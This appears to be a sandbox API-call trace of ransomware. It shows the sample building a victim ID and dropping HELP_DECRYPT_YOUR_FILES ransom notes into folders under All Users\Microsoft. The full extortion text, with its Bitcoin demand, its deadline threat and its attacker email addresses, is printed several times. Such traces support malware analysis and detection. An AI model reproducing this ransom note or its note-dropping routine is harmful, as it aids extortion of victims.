	[0177.454] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.457] CloseHandle (hObject=0x384) returned 1
	[0177.457] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.458] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.458] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.458] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.463] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.463] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.464] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.464] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.465] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.465] CloseHandle (hObject=0x384) returned 1
	[0177.465] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77d1fe08, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x834d3246, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.466] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows\\*.*") returned 40
	[0177.466] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.466] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\windows\\*.*") returned 0x28
	[0177.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows\\*.*", lpSrch="windows") returned="windows\\*.*"
	[0177.466] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.466] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1
	[0177.467] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1
	[0177.467] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1
	[0177.467] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.467] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.467] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Windows Defender" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender"
	[0177.467] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender"
	[0177.467] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\"
	[0177.467] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\"
	[0177.468] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*"
	[0177.468] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.472] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned 49
	[0177.472] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.472] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\windows defender\\*.*") returned 0x31
	[0177.472] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.472] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows defender\\*.*", lpSrch="windows") returned="windows defender\\*.*"
	[0177.473] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.475] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Defender" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender"
	[0177.475] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*"
	[0177.475] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.475] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.475] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\HELP_DECRYPT_YOUR_FILES.TXT") returned 73
	[0177.475] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.480] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.480] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.483] CloseHandle (hObject=0x384) returned 1
	[0177.483] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.483] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.483] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.484] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.485] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.485] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.485] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.485] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.485] CloseHandle (hObject=0x384) returned 1
	[0177.486] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.486] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.486] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.486] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Defender\\HELP_DECRYPT_YOUR_FILES.HTML") returned 74
	[0177.486] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.486] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.487] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.489] CloseHandle (hObject=0x384) returned 1
	[0177.489] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.490] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.490] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.490] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.491] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.491] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.492] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.492] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.492] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.492] CloseHandle (hObject=0x384) returned 1
	[0177.492] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8351f528, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.493] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned 49
	[0177.493] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.493] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\windows defender\\*.*") returned 0x31
	[0177.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.493] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows defender\\*.*", lpSrch="windows") returned="windows defender\\*.*"
	[0177.493] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~2")) returned 1
	[0177.494] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1
	[0177.494] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1
	[0177.494] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.494] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.494] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Windows Live" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live") returned="C:\\Users\\All Users\\Microsoft\\Windows Live"
	[0177.494] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Live" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live") returned="C:\\Users\\All Users\\Microsoft\\Windows Live"
	[0177.495] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live\\") returned="C:\\Users\\All Users\\Microsoft\\Windows Live\\"
	[0177.496] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Live\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live\\") returned="C:\\Users\\All Users\\Microsoft\\Windows Live\\"
	[0177.496] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*"
	[0177.496] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*" (normalized: "c:\\users\\all users\\microsoft\\windows live\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.497] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*") returned 45
	[0177.498] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.498] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\windows live\\*.*") returned 0x2d
	[0177.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.498] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\windows live\\*.*", lpSrch="windows") returned="windows live\\*.*"
	[0177.498] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.498] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Windows Live" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live") returned="C:\\Users\\All Users\\Microsoft\\Windows Live"
	[0177.498] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Windows Live\\*.*"
	[0177.498] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.499] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.499] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Live\\HELP_DECRYPT_YOUR_FILES.TXT") returned 69
	[0177.499] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows live\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.499] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.500] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.503] CloseHandle (hObject=0x384) returned 1
	[0177.504] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.504] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.509] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.510] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\windows live\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.510] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.510] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.511] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.511] CloseHandle (hObject=0x384) returned 1
	[0177.511] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.511] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.511] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.512] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows Live\\HELP_DECRYPT_YOUR_FILES.HTML") returned 70
	[0177.512] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows live\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
